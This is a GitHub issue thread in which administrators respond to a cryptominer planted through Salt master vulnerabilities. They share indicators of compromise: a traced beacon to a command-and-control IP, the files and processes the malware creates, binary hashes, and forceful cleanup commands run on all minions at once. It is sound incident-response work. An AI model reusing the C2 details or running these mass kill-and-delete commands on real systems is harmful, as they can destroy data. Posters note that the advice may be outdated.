Closed xiaopanggege closed 4 years ago
You should even consider that any data had chance to leak from server.
I've made backports for the CVE patches, see https://github.com/rossengeorgiev/salt-security-backports. Salt masters should not be accessible via the public internet. Or at the very least should be heavily firewalled.
I’m a little concerned about some of the victim blaming such as “use a firewall” since the official documentation specifically states to open up the firewall for the TCP ports. Sure, experienced admins will know to wall up your garden, but novice admins do not have such experiences yet.
FWIW
2406 write(7, "GET /h HTTP/1.1\r\nHost: 185.221.153.85\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\nArch: amd64\r\nCores: 1\r\nMem: 489\r\nOs: linux\r\nOsname: ubuntu\r\nOsversion: 14.04\r\nRoot: false\r\nUuid: 2e10f8e9-aa42-4223-59b1-9c1038862c25\r\nVersion: 30\r\nAccept-Encoding: gzip\r\n\r\n", 341) = 341
salt-store tries to push some meta data about the machine to it's C2 server (or some minion of it)
/E: and it uses some kind of jsonrpc to send keepalives
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to. This will be useful for cleanup.
Updated salt-master
but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
There is likely some sort of persistence established. The best course is to restore a backup prior to breach, or rebuild the server. If that's not possible, shutdown the salt-minion, and try to find what is relaunching the miners:
iftop
), then apply a firewall rule to block traffic to/from that IP./var/spool/cron
, and /etc/cron.{d,daily,weekly,monthly}/
/usr/lib/systemd/system
and /etc/systemd/system
/etc/init.d
/root/.bashrc
, /root/.bash_profile
grep
to search for files containing it across the entire file systemThere are many other possibilities, and you can never be 100% certain you've scrubbed all of the malicious code.
Switching to salt-ssh
and removing salt-master
and salt-minions
also helps greatly :)
FYI, after disabling minion service and rebooting, no more miners thing spawned. On my side, nothing left after a reboot (as long minion is disabled of course). I'll re-enable the service on a test machine and see if patched master solved it.
It's not a proof, however a heurstics: I diffed the filesystem (incluing bootloader) of my sandbox VM before and after i ran salt-store
and I haven't found any persistence mechanism.
This is the complete list of modified files by the malware:
/run/lock/linux.lock
/tmp/.ICEd-unix
/tmp/.ICEd-unix/346542842
/tmp/.ICEd-unix/uuid
/tmp/salt-minions
/var/tmp/.ICEd-unix
Probably noteworthy: I killed / restarted the process itself and subprocesses to see if the binary behaves different. However salt-store
always just restarted his minor child process.
Yet, they may use a VM detection and run different code branches on different environments. The sysctl patch was done by the sa.sh
bootstrap script, so it's not listed here. Since the sa.sh
can be seen as sourcecode in this thread i only focused on analyzing salt-store
.
I haven't seen any persistence mechisms in sa.sh
either.
I would still double check everything, if rebuild or backup restore is not possible, as this miner may not be the only attack.
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to. This will be useful for cleanup.
I did a grep -r confluence .
on this directory to check which clients did execute the sa.sh
script (this may be a false positive on confluence servers, yet not all servers run confluence i guess). For active salt-minions i'd run salt-key -L
.
I would still double check everything, if rebuild or backup restore is not possible, as this miner may not be the only attack.
If your master is not a minion as well, the master itself is not compromised by this vulnerability. Additionally, all commands executed on minions are still logged on the master by default. So it should be possible to track all actions which have been made by the salt vulnerability itself. This obviously excludes modifications by any programs salt has side-loaded on the machine which are most likely run under root privileges (like sa.sh
/ salt-minion
).
I've been digging through the salt-miner-snoopy-log.txt that was posted above:
Elements in that log file & loader script found elsewhere that may provide some additional insight into the underlying behavior: https://tolisec.com/yarn-botnet/ https://zero.bs/how-an-botnet-infected-confluence-server-looks-like.html https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ https://gist.github.com/OmarTrigui/8ba857c6a9a91724a7eb0cfdd040f50d https://s.tencent.com/research/report/975.html
Updated
salt-master
but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
Don't forget to restart the salt master as well.
For some reasons, in one of my instances killing all salt-minions
& salt-store
process as well as deleting those files doesn't seem to be working.
salt-minions
process starts within about 2 minutes of killing and deleting them.
Checked cron, init, systemd, bashrc, rc.local, nothing found. Still digging around, will update if anything worthy is found.
This is something I was worried about. The salt-store binary is capable of self-updating. It's possible there is additional persistence behavior now that wasn't there last night even. Can you md5 your binary?
Upfate: confirmed! The bitbucket repo force-pushed a new binary to the repo. It's now called "salt-storer" instead of salt-store. This was done 3 hours ago.
I ran the below on each of the servers as suggested above and then rebooted each box. (About 240 of them!) I am not seeing any more spawning after this.
kill -9 $(pgrep salt-minions) kill -9 $(pgrep salt-store) rm -f /tmp/salt-minions rm -f /var/tmp/salt-store sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf systemctl restart firewalld || /etc/init.d/iptables restart
Before I did that, I turned off my salt-master. What is the safest way to turn the master back on and patch it? It is a VPS that has internet connectivity. What is the best procedure to patch the master?
For some reasons, in one of my instances killing all
salt-minions
&salt-store
process as well as deleting those files doesn't seem to be working.salt-minions
process starts within about 2 minutes of killing and deleting them.Checked cron, init, systemd, bashrc, rc.local, nothing found. Still digging around, will update if anything worthy is found.
Not much but this:
root@myserver:/tmp/.ICEd-unix/bak# cat 328909204 && echo
25391
root@myserver:/tmp/.ICEd-unix/bak# ps ax | grep 25391
25391 ? Ssl 4:51 /tmp/salt-minions
25759 pts/5 S+ 0:00 grep 25391
root@myserver:/tmp/.ICEd-unix/bak#
So what's happening here is that, if I kill the salt-minions
service, after about 2 minutes a file gets written inside .ICEd-unix
folder. The content of that file would be a number which is PID of parent salt-minions
, and that file gets deleted as soon as salt-minion
process starts.
I had to loop cp
to get that file copied from .ICEd-unix
folder to .ICEd-unix/bak
, so please ignore that bak/
.
For some reasons, in one of my instances killing all
salt-minions
&salt-store
process as well as deleting those files doesn't seem to be working.salt-minions
process starts within about 2 minutes of killing and deleting them. Checked cron, init, systemd, bashrc, rc.local, nothing found. Still digging around, will update if anything worthy is found.Update 1
Not much but this:
root@myserver:/tmp/.ICEd-unix/bak# cat 328909204 && echo 25391 root@myserver:/tmp/.ICEd-unix/bak# ps ax | grep 25391 25391 ? Ssl 4:51 /tmp/salt-minions 25759 pts/5 S+ 0:00 grep 25391 root@myserver:/tmp/.ICEd-unix/bak#
So what's happening here is that, if I kill the
salt-minions
service, after about 2 minutes a file gets written inside.ICEd-unix
folder. The content of that file would be a number which is PID of parentsalt-minions
, and that file gets deleted as soon assalt-minion
process starts. I had to loopcp
to get that file copied from.ICEd-unix
folder to.ICEd-unix/bak
, so please ignore thatbak/
.
Did you update and restart your salt-master? Could it be kicking it off again?
Updates to the malware continue to go out. This thread may now contain outdated hints and help.
Oh yes. It's happening after updating and restarting salt-master.
salt 3000.2
root@00:/var/cache/salt# systemctl status salt-master
● salt-master.service - The Salt Master Server
Loaded: loaded (/lib/systemd/system/salt-master.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2020-05-03 21:10:31 +0545; 1h 11min ago
Docs: man:salt-master(1)
file:///usr/share/doc/salt/html/contents.html
https://docs.saltstack.com/en/latest/contents.html
Main PID: 19783 (salt-master)
Tasks: 34 (limit: 4915)
Memory: 279.8M
CGroup: /system.slice/salt-master.service
├─19783 /usr/bin/python3 /usr/bin/salt-master
------ truncated -----------
May 03 21:10:31 00 systemd[1]: Stopped The Salt Master Server.
May 03 21:10:31 00 systemd[1]: Starting The Salt Master Server...
May 03 21:10:31 00 systemd[1]: Started The Salt Master Server.
And it's happening even after I have salt-master stopped. Tested just now, double checked by stopping salt-master.
@Avasz Can you tree your processes and see what the parent process is? And what's the md5sum of your salt-store binary? I can run it in a container and see what other files it might touch.
@taigrr Parent process: /sbin/init :open_mouth: I don't have /var/tmp/salt-store binary anymore..
@Avasz this thing has morphed quite a bit. I'm starting to think a GitHub issue isn't the best way to troubleshoot anymore.
I have both binaries:
md5sum /tmp/salt-minions a28ded80d7ab5c69d6ccde4602eef861 /tmp/salt-minions
md5sum /var/tmp/salt-store 8ec3385e20d6d9a88bc95831783beaeb /var/tmp/salt-store
I was also seeing just one of my machines established a persistence for salt-minions without salt-store(r).
I wrote a quick bash while-lsof to catch it, and a randomly-named process was writing out the file.
I just rebooted that machine. If it re-establishes, I'm going to write a quick script to send a SIGSTOP (and/or hook gdb) when lsof picks it up again.
@astronouth7303 What is the name of that random process? Is it "vXrSv"?
It is always that and salt-minions
in my case.
salt-mini 4692 root 1u REG 8,1 4 667325 104066568
vXrSv 7619 root 6u REG 8,1 4 667325 104066568
@taigrr yeah.. this issue doesn't seem to be a good place to discuss anymore. Any other alternative communication channel? Telegram? Slack? :)
@astronouth7303 What is the name of that random process? Is it "vXrSv"? It is always that and
salt-minions
in my case.
Nope, mine was XrqMv
It doesn't seem to be coming back after reboot.
SaltStack has a slack, which seems like the obvious choice?
@astronouth7303 What is the name of that random process? Is it "vXrSv"? It is always that and
salt-minions
in my case.Nope, mine was
XrqMv
It doesn't seem to be coming back after reboot.
SaltStack has a slack, which seems like the obvious choice?
Just rebooted and it stopped coming back.
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/ I've created a dedicated channel (salt-store-miner-public). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
@taigrr Would like to join the conversation.
This whole "don't have your salt master exposed to the internet" thing has me annoyed. The whole point of salt is to manage boxes all over the place. I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again. I'm about to test binding salt-master to localhost and salt-minion to localhost and then setting up spiped to wrap the traffic...
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite I've created a dedicated channel (salt-store-miner). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
i would like to be added
I'd also be happy to be invited, thanks.
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite I've created a dedicated channel (salt-store-miner). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
Me too please
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite I've created a dedicated channel (salt-store-miner). Send username to be added. @Avasz Be careful. I don't believe it's gone.
Me too please
Me too plaese
I'd also be happy to be invited, thanks.
Username on slack? Can't find you, @nbuchwitz
Guys, please give me your slack names. You must already be a part of the slack group I posted the link above. Having trouble finding some of you. You can also dm me through slack (Tai Groot) to prevent from cluttering this issue.
I used these commands to remove the binaries and stop the processes on all hosts. The second one is from @opiumfor, above.
salt -v '*' cmd.run 'rm /var/tmp/salt-store && rm /tmp/salt-minions'
salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This whole "don't have your salt master exposed to the internet" thing has me annoyed. The whole point of salt is to manage boxes all over the place. I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again.
I do agree with this. I also have a similar use case. 1000+ devices all in various places, various networks. VPN & controlled access to port 4505 & 4506 not possible at all. Salt was the perfect tool .
Very quick and dirty howto to wrap salt traffic in spiped for encryption: https://gist.github.com/darkpixel/51930435c27724d2b41daa8c6bded673
I'm going to work on a few salt states to automatically push these changes out to my minions and I will publish those as well.
@taigrr I would like to be added to slack as well. Thanks! user: int-adam
A small hint for those with "recurring" malware issues. If you have installed saltstack from your distribution repositories the master may still be vulnerable. Right now there are no fixed versions in any ubuntu and debian official repositories. EPEL (there is no saltstack in CentOS directly) was last updated in 2016.
Personally, I'd just shutoff the salt-master, wait for a fixed version and put it back online afterwards. If this is a feasible solution.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
Updated link. Try again.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
I couln´t access this link either. What´s the correct Slackware´s signup link?
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
Updated link. Try again.
OK the link worked this time.
Hi there. This one got me too. When I try to access https://saltstackcommunity.herokuapp.com/invite it says 'Not Found'. Would really appreciate some help recovering from this issue...
Description My all servers with salt-minion installed,An unknown program suddenly ran today, He's /tmp/salt-minions
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39, 3 users, load average: 2.01, 2.02, 1.91 Tasks: 193 total, 1 running, 192 sleeping, 0 stopped, 0 zombie Cpu(s): 7.2%us, 18.3%sy, 0.0%ni, 74.1%id, 0.4%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 8060948k total, 7502768k used, 558180k free, 76316k buffers Swap: 4194300k total, 437368k used, 3756932k free, 188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef |grep 27061 | grep -v grep root 27061 1 89 09:26 ? 00:36:37 /tmp/salt-minions
sal-minion version 2018.3.2 sys:CentOS release 6.5 (Final)